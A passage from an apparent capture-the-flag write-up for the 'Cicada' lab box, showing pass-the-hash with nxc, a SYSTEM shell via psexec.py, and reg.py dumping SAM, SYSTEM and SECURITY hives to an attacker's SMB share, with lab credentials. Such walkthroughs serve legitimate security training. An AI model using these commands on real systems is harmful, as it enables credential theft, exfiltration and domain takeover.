nxc smb 10.129.231.149 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341
SMB   10.129.231.149   445   CICADA-DC   [+] cicada.htb\Administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!)

And we can drop straight into an interactive SYSTEM shell with Impacket's psexec.py, which uploads a temporary service binary over ADMIN$, registers it as a Windows service, and starts it to get a cmd.exe running as NT AUTHORITY\SYSTEM. (-hashes takes LM:NT; the LM half is ignored, so passing the NT hash twice as below works, though the usual form is an empty LM half, :NT.)

psexec.py -hashes 2b87e7c93a3e8a0ea4a581937016f341:2b87e7c93a3e8a0ea4a581937016f341 [email protected]
[*] Found writable share ADMIN$
[*] Uploading file KRDvNjra.exe
[*] Starting service sJNc.....
C:\Windows\system32>

Alternative — Remote Hive Save with Impacket's reg.py

Everything above pulled the hives out through Evil-WinRM's own download command, which reads the file over the existing WinRM/HTTP channel. Impacket ships an alternative: reg.py's backup action drives the same reg save operation remotely over RPC, but instead of writing the hive to local disk on the target, it can push it directly to an attacker-controlled SMB share, skipping the local file entirely.

First we stand up a listener with impacket-smbserver:

sudo impacket-smbserver -smb2support share $(pwd)

Then we point reg.py at it, authenticating as emily.oscars and passing our share as the backup destination:

reg.py 'cicada.htb/emily.oscars:Q!3@Lp#M6b*7t*Vt'@10.129.231.149 backup -o //10.10.14.246/share
[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to //10.10.14.246/share\SAM.save
[*] Saved HKLM\SYSTEM to //10.10.14.246/share\SYSTEM.save
[*] Saved HKLM\SECURITY to //10.10.14.246/share\SECURITY.save

reg.py starts the RemoteRegistry service through a named pipe if it isn't already running, then performs the same reg save we did manually against SAM and SYSTEM, plus SECURITY, which holds the LSA secrets (service account passwords, the DPAPI system key, cached domain logon hashes) that our manual reg save never touched. In principle this is strictly more capable and saves a manual step, since the files land straight on our machine.

Why we didn't end up using it here: smbserver.py is a pure-Python SMB server meant for convenience, not throughput. Against small files like SAM, SYSTEM and SECURITY it is fine, but when we pushed the 16MB NTDS.dit from the full domain dump above through the same share it repeatedly stalled and dropped the connection mid-transfer (reg.py's backup action itself only saves hives; NTDS.dit has to be copied to the share separately). It also needs the target to reach back to our SMB port, which egress filtering can block in ways a WinRM download, riding the connection we already have open, never runs into. For small, one-shot hive dumps reg.py is a fine shortcut; for anything larger, Evil-WinRM's download was the more reliable path in practice.